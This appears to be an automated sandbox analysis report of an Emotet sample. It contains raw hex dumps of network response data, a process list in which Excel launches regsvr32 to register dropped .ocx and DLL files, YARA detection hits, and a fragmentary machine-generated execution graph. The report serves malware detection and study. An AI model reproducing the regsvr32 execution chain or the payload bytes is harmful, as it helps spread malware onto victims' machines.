                                                2022-05-23 06:35:01 UTC526INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00
                                                Data Ascii: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                2022-05-23 06:35:01 UTC542INData Raw: 71 a0 9a b6 41 18 21 1c ea e3 ae 65 f1 68 71 7d 2f a0 2c 24 0e ba 3f 4e 16 c3 70 69 7d 9e 49 b1 25 5f 38 e2 9c 18 a0 a4 62 6b 8b 66 ed 9a 1d 47 f6 3e 78 ed 3c 65 21 9d 08 f7 a7 0c 70 2b c8 b1 7c 81 85 21 0f 1c 49 66 a2 6a a4 2d de bb 6c d8 3d 61 62 53 c0 3c dd ac 2e 7a 00 cd a5 23 76 de 0f c8 9b 37 e8 2c 74 63 f1 7a 2f d1 ab 12 7e 19 0d 8d 23 da f2 35 4e 36 a3 58 4c 67 f9 1e 47 13 54 30 d0 f6 e4 43 11 6c a8 7d f3 ce a2 65 5e 64 02 d3 5b 2b e3 4c 6a 71 9c 8b e6 89 e2 7c 04 b7 8c 45 ad 0b 5d 29 99 34 0f 2f 22 e9 3c 0e 26 9f 59 1e 35 b1 07 11 3d 52 b3 da 45 b3 03 5c 26 6b c2 16 10 3a e1 bc ea b7 fb 21 40 2f c2 16 b7 7a a5 11 1d 2f 70 85 00 4e ba 27 4e 1a bf dd 8c db 72 ef 14 00 1b f8 1d 7c 14 fe 4a 2f 68 c3 6e 42 1e da 28 11 3a c8 71 55 2a ed 1c 61 22 23 f3
                                                Data Ascii: qA!ehq}/,$?Npi}I%_8bkfG>x<e!p+|!Ifj-l=abS<.z#v7,tcz/~#5N6XLgGT0Cl}e^d[+Ljq|E])4/"<&Y5=RE\&k:!@/z/pN'Nr|J/hnB(:qU*a"#
                                                2022-05-23 06:35:01 UTC558INData Raw: 35 3c a2 20 4f 53 00 02 59 24 d4 4d 4f 1f 2e fe 09 9c ea 2e 7a 7c b9 eb 31 76 e7 34 00 6b 75 55 31 fd ec ea 22 6a 48 2a fb 7f 37 6c be fb 4b 37 71 6a 91 b9 84 98 61 f1 ff 6b 41 62 34 f7 ea 6d 35 35 3c be 73 2c 2f a4 84 72 26 55 39 67 aa dd 08 4c 31 6b df 71 39 5a c6 b4 7e 64 40 24 d4 3d 4d 6c db 6f 4b 1a e3 1c 0e 5e b2 23 24 35 76 0b be a9 22 e5 a0 ba 7d e3 2a 94 9c bc da 8d 21 56 65 de 89 c1 9a 9b 23 ee 19 05 22 9c 87 78 62 2b 81 ad b3 ce 94 ad 1a 6c 0c 52 62 71 66 0c a9 12 d9 21 d3 9b aa 2b 0e 58 cd 09 66 5a 90 08 11 46 48 b4 05 4e 56 f7 54 c5 5c bf ef 6b 41 62 34 2c 52 bd 37 b4 b9 6d 66 6b 67 1f 21 85 db d4 8c 63 29 68 00 32 ba 35 cc df fd 34 4f 31 76 0c 9b a7 f9 be 2d 7c 64 d6 68 0e 68 c9 66 42 6e 73 ce e6 0d c2 41 55 5e 84 1e b3 09 ec 3c 4e 57 07 e9
                                                Data Ascii: 5< OSY$MO..z|1v4kuU1"jH*7lK7qjakAb4m55<s,/r&U9gL1kq9Z~d@$=MloK^#$5v"}*!Ve#"xb+lRbqf!+XfZFHNVT\kAb4,R7mfkg!c)h254O1v-|dhhfBnsAU^<NW
                                                2022-05-23 06:35:01 UTC574INData Raw: 5f 26 92 c1 3e 0f 97 78 ba c3 2c 03 8c 70 aa 82 58 0c b5 09 15 42 27 f8 b0 82 d3 33 d9 24 0f 5b d1 9f 89 af e7 2e 75 58 ea e5 81 b0 fa 2e 42 6c ce 36 43 48 82 9f f4 63 34 3e d6 60 4e 2a 3e 65 2c e0 ac 2d a2 be 74 0e 71 94 cb a4 cc 06 b2 87 22 99 0c 18 7d 16 b3 6b 40 e3 1b 5d 5d 42 46 2c 6f ed 2c 6c 12 5b 5f 5e 6c f2 32 67 6d c1 45 0b 58 fd d1 53 46 58 e2 0f 46 6c 4c da 4b 9f b4 78 41 3c c4 c1 9a de f1 68 71 61 9c ca 43 ca 9f d8 68 a0 9f a1 3a c4 7d 52 3e c1 50 7b 21 6d a1 c4 2a a8 6e 4c 20 71 bd 0b 51 ad 59 52 2b 25 f0 1e 42 30 a3 45 6f 78 ad 27 67 02 ff 06 d9 65 f6 51 18 05 6d ea 13 41 41 0c 24 bc 35 ac 6f 4c 50 9f af fc 6a 35 0c 18 1d 22 ff 22 64 74 de 35 4d 08 af 94 65 c1 e9 3c 0e 36 fc fe 28 de fd 07 11 21 2e ed 14 61 12 23 f3 2e 47 2b 2a bf 63 57 7b
                                                Data Ascii: _&>x,pXB'3$[.uX.Bl6CHc4>`N*>e,-tq"}k@]]BF,o,l[_^l2gmEXSFXFlLKxA<hqaCh:}R>P{!m*nL qQYR+%B0Eox'geQmAA$5oLPj5""dt5Me<6(!.a#.G+*cW{
                                                2022-05-23 06:35:01 UTC590INData Raw: bd a1 e5 3a 6b 2b e6 7b 83 31 ea df ee 4b 3c 4d c8 ed 7e 7d e5 f2 c9 6a 58 50 2f ee af d8 4b 2a 66 36 d2 93 ca f7 f6 85 72 6a 66 b0 b1 af 64 bf ef ab 40 62 34 ed ff 23 37 f4 99 ad 67 6b 67 6e e0 df ec 56 39 6b 24 e9 b5 86 32 6b 6a 49 16 30 21 f6 f3 de 43 24 5f 84 b4 1d 50 aa da 92 6b 48 2a 15 4b 01 fd be fb fb 36 71 6a 91 b9 84 98 65 f1 ff db 40 62 34 f7 da dd 34 35 3c 93 28 6b 67 e4 94 c2 27 55 39 1f 32 4f 18 c5 b4 d3 69 5e 48 b5 09 15 46 22 c9 60 7b 51 2d d3 d5 e3 6c 2a 68 c3 bf d6 59 51 6c be 3a 67 61 39 e7 e3 28 44 72 67 30 e3 27 67 42 dc 2c d4 65 37 be b1 a5 67 6b 67 5e e0 75 a0 91 ce 94 d4 d3 a9 47 38 6b eb a5 e1 35 44 31 79 e3 f5 d3 a0 86 e2 9f 18 aa ab a2 6c 48 2a 39 04 0a 31 f6 ba 0f be ad 23 ef 03 4d 3b ee 13 7a 2a ca 11 2c 21 17 e6 db 55 b7 e1
                                                Data Ascii: :k+{1K<M~}jXP/K*f6rjfd@b4#7gkgnV9k$2kjI0!C$_PkH*K6qje@b445<(kg'U92Oi^HF"`{Q-l*hYQl:ga9(Drg0'gB,e7gkg^uG8k5D1ylH*91#M;z*,!U
                                                2022-05-23 06:35:01 UTC606INData Raw: 26 4b 9b f9 bd c8 e0 27 3e bf dd 66 fb a7 8f 43 ee 9e 90 6f d1 1d 4b ee 5f 08 93 45 4c 58 da 39 55 fd 0e 6d 98 98 9c a7 ba b5 22 10 d6 78 ae 62 5f 33 37 2a be 70 54 a4 01 03 61 e4 54 12 08 95 d1 21 ec 2d 88 88 17 28 6a 35 0d b4 34 b8 33 ee c1 51 d7 6b 5b e2 4f ec 2a 4a 06 56 4e 66 db 1c 0c 96 9c 98 fb 1a 2f 06 1c cc 37 07 c0 25 8f 87 2c b5 03 3f f0 70 c4 c7 a2 21 33 ee d3 a5 7a e5 38 61 60 a0 25 58 b9 d0 aa 80 5b c1 69 15 b0 03 3e a7 ec 55 79 e2 1d 08 a0 2a 4a e3 0d a2 ed 1f 39 24 be 73 22 ab 70 6a ed d0 e5 72 67 78 82 e1 22 63 34 3e d4 ad 7f be 39 29 fa 6a 67 2d a8 f2 bc 55 39 6b 63 9f d9 55 c7 ea 8c f1 e0 37 4d 70 75 92 a9 ab a9 86 96 9f 15 4b 23 ea 24 48 eb 03 3a 59 ed 40 16 10 57 bb 26 a1 1d 1d 38 68 94 6a e2 06 3a 05 fb 5f 65 b6 40 64 c4 10 8e 67 ee
                                                Data Ascii: &K'>fCoK_ELX9Um"xb_37*pTaT!-(j543Qk[O*JVNf/7%,?p!3z8a`%X[i>Uy*J9$s"pjrgx"c4>9)jg-U9kcU7MpuK#$H:Y@W&8hj:_e@dg
                                                2022-05-23 06:35:01 UTC622INData Raw: 2a 55 5c 6a df 0d 9b aa cf 89 99 c1 51 f8 75 bd 6d 50 6f e4 67 cf c3 67 19 b2 62 5f 34 76 fb d5 eb 60 66 b1 63 8d 98 87 ad 26 3c 22 d4 f0 5f a4 52 4a 3f e4 11 14 15 81 1b 7e af 10 46 83 34 98 fe b1 f6 2e 15 d0 21 2b 4d ba 3b 19 08 af 87 c1 d6 64 e6 09 98 cb a9 a2 2e de f9 da 42 8f ff 16 4a b0 07 19 51 c4 37 18 5b a7 63 43 e3 41 09 1b f8 3e 35 fb 20 c3 c1 8f 89 21 f1 69 f2 ce 8a ea 82 03 c7 64 cc eb 2b ef 23 76 23 76 ed 05 83 d4 3c 16 b0 22 3a 6e 2a af 0d 81 50 89 10 6c 71 fd 83 7d f8 16 42 10 ce 3f cc c0 b1 e2 fa 14 c3 97 9e 8f 32 bc 69 ce e5 1e cc c9 59 71 24 92 7c c4 9f 1e 5d 4e b0 2e c5 3d 68 c3 b2 b0 03 c9 3d 81 0a 79 ae 1d e3 e9 1d f6 68 c9 5f d5 0e 8e d5 7a f7 36 86 1d 9b 04 17 82 37 c0 6a 56 18 43 e3 71 d1 d3 61 c8 ca bd 10 c3 2e 33 1f 21 bd 61 2a
                                                Data Ascii: *U\jQumPoggb_4v`fc&<"_RJ?~F4.!+M;d.BJQ7[cCA>5 !id+#v#v<":n*Plq}B?2iYq$|]N.=h=yh_z67jVCqa.3!a*
                                                2022-05-23 06:35:01 UTC638INData Raw: 5e c8 3b 8a 74 9e 8a 95 e3 5f b8 04 b0 5e aa 1a c2 77 4b 2a 66 9d 14 88 fa d3 87 35 b0 07 82 5c c4 37 83 02 da 63 43 e3 41 92 86 fb 3d 35 fb 20 84 32 24 f2 21 bb 41 b5 3b aa 46 88 0f 8f 54 8b 66 df 3d dc 2c 39 37 66 87 61 af 1f 2d eb 50 aa 22 da 00 ad 96 c9 db 24 9c 68 92 f7 9a b6 2f 8a b9 64 9e 67 13 2f 8f 08 eb 71 9a e7 be 7c 5d 13 e4 11 87 fc 9b 08 3f e3 10 11 c7 4e 94 00 c5 7c 43 9d bf 63 f6 9c d8 75 ac 81 cd 59 f0 24 70 d1 6e 47 9e 40 48 2a e7 1f 79 39 a2 89 bc b4 04 42 07 78 41 72 23 f3 2f 43 c8 27 dc ff 1b 41 77 be 79 4d ed 2f 43 5d 69 f7 21 21 0b 6b 2b 20 89 0a 15 5b e1 1b a4 78 c6 7c 86 ed 15 c4 d4 34 8d d1 14 0f 47 c2 89 24 d5 99 12 d8 2f 6d 3e c6 f5 7e ef cb 58 45 72 df e3 40 6e 43 5f c4 16 55 65 38 b1 a1 65 64 6b 8e d8 dd 85 db 92 7c 8b 6c ff
                                                Data Ascii: ^;t_^wK*f5\7cCA=5 2$!A;FTf=,97fa-P"$h/dg/q|]?N|CcuY$pnG@H*y9BxAr#/C'AwyM/C]i!!k+ [x|4G$/m>~XEr@nC_Ue8edk|l
                                                2022-05-23 06:35:01 UTC654INData Raw: 81 75 66 40 c1 8c db 69 d3 d5 9b 6c 2a 68 89 ca 65 d3 d4 dc 36 76 43 f4 dc da 65 58 45 62 e6 cd da 60 43 62 ec 7f 56 65 bc b0 8c 66 64 6b ec e0 99 79 24 55 d1 2b fb 97 ff 89 b4 ab 69 5e 48 e9 97 9e 76 2e cb fc e7 36 85 9c 1e a0 e2 ea 6b 48 2a 91 bb 90 86 36 ff d6 f5 72 6a 66 99 e8 b2 64 78 6a 67 c2 d7 f4 75 5f 65 a6 6c 69 51 e5 de a7 66 21 7a 51 2d 61 5f ec ed c8 4d 31 6b 42 5f 45 3c cc 84 be 65 40 24 63 2d 10 d3 d1 ae a7 29 68 48 dd f1 5a 51 ed 80 be 40 35 71 67 30 26 ce b5 e2 c0 69 63 43 b7 f0 74 5f a4 92 8d 3f 65 64 63 0c e0 99 79 24 55 27 e2 ae d0 03 4e 31 d3 55 9b 6d 7f c6 bc ce 65 40 24 a8 98 21 d5 1c 0f 1f 62 e1 04 0e 2e 9b bb 68 7d fd 88 bc e4 d2 65 58 45 f3 d2 c0 69 63 43 25 7e 29 5e a2 73 11 6c 89 52 42 67 a4 4d 5e 74 5c b8 1f 0f 38 3b ce 37 6b
                                                Data Ascii: uf@il*he6vCeXEb`CbVefdky$U+i^Hv.6kH*6rjfdxjgu_eliQf!zQ-a_M1kB_E<e@$c-)hHZQ@5qg0&icCt_?edcy$U'N1Ume@$!b.h}eXEicC%~)^slRBgM^t\8;7k
                                                2022-05-23 06:35:01 UTC670INData Raw: af 13 5d 49 af b1 fa 85 a3 3c 6c 0a e7 16 75 4c 80 05 f8 03 f0 1e 42 78 a5 3f d6 4e e1 27 67 42 bd 32 7b 45 7f b6 f8 7d a7 23 ec a1 69 f3 7c 5d 71 e2 43 78 48 c7 41 73 3d 16 cb d0 2d 79 f5 06 a0 24 d4 cd 4d e8 50 2b 6f 62 e3 e4 0e f6 5a 51 6c bc 06 9b be f5 4e ce 58 45 72 2e f3 b3 ea 07 46 0c fd db 41 97 35 3c 65 2c e0 9e ec 65 5e 14 de bd 4f b3 68 00 4e b8 2f 4e 76 00 b5 21 15 56 8e ac e8 a0 86 5a 98 97 6f 4b 72 1b 58 2b 66 d3 15 48 69 3e c8 30 56 cb 66 58 0d f7 a7 0d 11 a4 07 46 64 e6 a1 48 37 74 84 da 34 76 80 a4 4d 5e 74 5c b8 1f 0f 38 9e 43 33 6b ad da 6c 84 4d 31 76 17 58 fd 5f f2 ed 7c e8 2b 6f 2a e5 44 6a a7 bb 53 e5 b9 52 fb 35 71 6a df e6 c5 2c ff 13 ee 47 fb 62 34 76 73 ec b3 11 84 65 64 6b e6 e1 05 c2 24 55 39 1c e8 97 ff cf 85 4f d2 5e 48 3c
                                                Data Ascii: ]I<luLBx?N'gB2{E}#i|]qCxHAs=-y$MP+obZQlNXEr.FA5<e,e^OhN/Nv!VZoKrX+fHi>0VfXFdH7t4vM^t\8C3klM1vX_|+o*DjSR5qj,Gb4vsedk$U9O^H<
                                                2022-05-23 06:35:01 UTC686INData Raw: 52 50 2b ee 9f 20 42 2a 66 8a d2 29 35 fd c6 7d 7b 6a 66 b0 58 74 98 87 22 e8 fe 2a 3e 76 5f 2d bc c5 79 56 a4 ea 9c 1f 7d 71 24 5a b6 b2 2c 68 00 41 b5 b0 6c 5e 48 bd b6 0e a7 66 40 2b db 5b 6c 58 50 aa 94 56 84 49 2a 69 de 6f 6e 35 76 c2 ce fc c7 65 58 4a f6 ad 79 6a 63 c2 99 3a 2a 5a 65 38 b1 77 64 64 6b e6 9e 63 a6 2c 55 36 ee 08 66 00 4e f6 2f 4e 2e eb d4 02 31 ce ab 8c e8 93 be 2d 7c 10 2a 6f 2a 68 c9 66 42 2a 43 ee a8 7e 0f bc 35 4e 5e d9 01 56 17 a9 d2 63 43 e3 40 52 2f e1 94 d5 34 a2 e1 3b 6d 65 21 f8 cd 1a 39 ea 9e 38 0a 4e 31 cd b5 81 e3 b7 c0 61 7c 66 40 d3 be b8 83 5a d9 be 3f 20 68 48 eb cb 0a 5b 6c 35 78 c2 80 21 60 66 58 a3 c4 65 78 ad 27 67 16 70 36 39 65 b6 71 18 11 49 7a 67 65 a0 0e 00 21 63 33 45 68 c7 cb 79 61 6a 5e 8c d4 a1 31 1d e3
                                                Data Ascii: RP+ B*f)5}{jfXt"*>v_-yV}q$Z,hAl^Hf@+[lXPVI*ion5veXJyjc:*Ze8wddkc,U6fN/N.1-|*o*hfB*C~5N^VcC@R/4;me!98N1a|f@Z? hH[l5x!`fXex'gp69eqIzge!c3Ehyaj^1
                                                2022-05-23 06:35:01 UTC702INData Raw: 5f 17 6d 4b f9 17 da 29 4a ff 07 11 59 e1 23 97 01 f9 2a b3 e1 35 03 e9 79 b1 d6 21 13 15 d4 f7 6c 95 98 dd 1f 0b 29 55 d0 67 d5 97 ff 89 74 a0 8b ca 70 3c 05 bc 20 7e 0c a9 12 9e e8 1d 9b ef de d5 97 c9 67 ad d9 0d d4 50 f7 36 fe 36 5b d3 3d 82 37 a0 db b4 c8 43 a3 51 b1 5a 0e 72 f2 4e ec 21 ac e6 10 e6 9b 06 7d a8 ac 6e 17 bf 7d 1f 6b eb 1b 37 60 fd 31 76 a7 2d 5b 56 f8 2c 27 ba 12 6f 2a e9 3d 55 01 f9 52 6c be 33 3c 71 fa 2f a1 d3 08 b9 ee 3c 4e 43 ab e2 ae 88 a0 dd 37 10 39 65 8d f9 9a 9a de bd 61 92 f6 f7 eb 68 b8 51 43 32 5b 12 c5 79 aa ba 3b a1 b7 c5 9e 93 6d d1 05 ec ee 5f af b3 b8 68 5a 96 29 fe ea ce 36 71 eb 23 93 78 ee 67 78 eb 2e 88 63 cb b2 47 e4 72 fe 8f b2 64 6b e6 10 ea 3d 82 92 21 ac 6e a7 74 a9 82 6b eb 13 87 a0 37 29 da e7 35 eb a5 c6
                                                Data Ascii: _mK)JY#*5y!l)Ugtp< ~gP66[=7CQZrN!}n}k7`1v-[V,'o*=URl3<q/<NC79eahQC2[y;m_hZ)6q#xgx.cGrdk=!ntk7)5


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:08:34:17
                                                Start date:23/05/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                Imagebase:0x13fd50000
                                                File size:28253536 bytes
                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:3
                                                Start time:08:34:26
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.925945389.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high

                                                Target ID:4
                                                Start time:08:34:28
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll"
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1223146291.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high

                                                Target ID:5
                                                Start time:08:34:30
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.936818785.0000000002010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.936929041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high

                                                Target ID:6
                                                Start time:08:34:30
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                Imagebase:0xff7d0000
                                                File size:27136 bytes
                                                MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Target ID:7
                                                Start time:08:34:32
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll"
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1223965620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1223393241.0000000001F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high

                                                Target ID:8
                                                Start time:08:34:34
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.943746358.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.943475793.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high

                                                Target ID:9
                                                Start time:08:34:36
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WFwVcxpK\qMgBgEIcUslg.dll"
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1223804747.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1223136184.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                Target ID:10
                                                Start time:08:34:39
                                                Start date:23/05/2022
                                                Path:C:\Windows\System32\regsvr32.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                                Imagebase:0xfff90000
                                                File size:19456 bytes
                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:6.7%
                                                  Dynamic/Decrypted Code Coverage:2.5%
                                                  Signature Coverage:10%
                                                  Total number of Nodes:1905
                                                  Total number of Limit Nodes:30
                                                  execution_graph 16679 7fef9d30215 16680 7fef9d30231 16679->16680 16684 7fef9d30302 16679->16684 16750 7fef9d38c80 16680->16750 16682 7fef9d30489 16770 7fef9d32d80 16682->16770 16687 7fef9d3040d 16684->16687 16757 7fef9d38c30 16684->16757 16685 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16688 7fef9d3027e OutputDebugStringW 16685->16688 16687->16682 16690 7fef9d31640 17 API calls 16687->16690 16691 7fef9d30296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16688->16691 16689 7fef9d304a3 16692 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16689->16692 16695 7fef9d3045c 16690->16695 16703 7fef9d302f2 16691->16703 16693 7fef9d304d0 16692->16693 16698 7fef9d3053d 16693->16698 16699 7fef9d32d80 17 API calls 16693->16699 16705 7fef9d30583 16693->16705 16697 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16695->16697 16697->16682 16700 7fef9d32d80 17 API calls 16698->16700 16701 7fef9d30510 16699->16701 16702 7fef9d30556 16700->16702 16707 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16701->16707 16708 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16702->16708 16709 7fef9d23280 __GSHandlerCheck 8 API calls 16703->16709 16704 7fef9d30357 16706 7fef9d303af 16704->16706 16710 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16704->16710 16783 7fef9d31590 16705->16783 16706->16687 16760 7fef9d31640 16706->16760 16707->16698 16708->16705 16712 7fef9d30cae 16709->16712 16710->16706 16714 7fef9d303e0 16715 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16714->16715 16715->16687 16716 7fef9d305fa 16717 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16716->16717 16718 7fef9d30652 16716->16718 16717->16718 16719 7fef9d31640 17 API calls 16718->16719 16721 7fef9d306b0 16718->16721 16720 7fef9d30683 16719->16720 16722 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16720->16722 16723 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16721->16723 16722->16721 16724 7fef9d30769 16723->16724 16725 7fef9d2d490 std::exception::_Copy_str 17 API calls 16724->16725 16740 7fef9d307bd 16724->16740 16726 7fef9d30790 16725->16726 16727 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16726->16727 16727->16740 16728 7fef9d30905 16728->16703 16729 7fef9d30a26 16728->16729 16730 7fef9d309a4 GetFileType 16728->16730 16731 7fef9d30ba5 16729->16731 16732 7fef9d30b97 OutputDebugStringW 16729->16732 16734 7fef9d309d0 16730->16734 16738 7fef9d309ce 16730->16738 16731->16703 16735 7fef9d30c23 16731->16735 16736 7fef9d38c80 _itow_s 17 API calls 16731->16736 16732->16731 16737 7fef9d309dd WriteConsoleW 16734->16737 16787 7fef9d2b470 16735->16787 16739 7fef9d30bf6 16736->16739 16737->16729 16741 7fef9d30a2b GetLastError 16737->16741 16742 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16738->16742 16743 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16739->16743 16740->16728 16786 7fef9d29360 LeaveCriticalSection 16740->16786 16741->16729 16741->16738 16745 7fef9d30ab5 16742->16745 16743->16735 16746 7fef9d30b26 WriteFile 16745->16746 16747 7fef9d30ad0 16745->16747 16746->16729 16749 7fef9d30add WriteFile 16747->16749 16749->16729 16751 7fef9d38cd3 16750->16751 16752 7fef9d38ca6 16750->16752 16754 7fef9d38d00 _itow_s 17 API calls 16751->16754 16752->16751 16753 7fef9d38cad 16752->16753 16813 7fef9d38d00 16753->16813 16756 7fef9d30251 16754->16756 16756->16685 16829 7fef9d386b0 16757->16829 16759 7fef9d38c74 16759->16704 16761 7fef9d31661 16760->16761 16762 7fef9d316c2 16761->16762 16763 7fef9d31700 _calloc_dbg_impl 16761->16763 16765 7fef9d2bd70 _invalid_parameter 17 API calls 16762->16765 16764 7fef9d31832 _calloc_dbg_impl 16763->16764 16767 7fef9d317f4 16763->16767 16766 7fef9d316f6 _calloc_dbg_impl 16764->16766 16769 7fef9d2bd70 _invalid_parameter 17 API calls 16764->16769 16765->16766 16766->16714 16768 7fef9d2bd70 _invalid_parameter 17 API calls 16767->16768 16768->16766 16769->16766 16771 7fef9d32da1 16770->16771 16772 7fef9d32e02 16771->16772 16774 7fef9d32e40 _calloc_dbg_impl 16771->16774 16773 7fef9d2bd70 _invalid_parameter 17 API calls 16772->16773 16777 7fef9d32e36 _calloc_dbg_impl 16773->16777 16775 7fef9d32f34 16774->16775 16776 7fef9d32f72 _calloc_dbg_impl 16774->16776 16778 7fef9d2bd70 _invalid_parameter 17 API calls 16775->16778 16779 7fef9d330b5 16776->16779 16781 7fef9d330f3 _calloc_dbg_impl 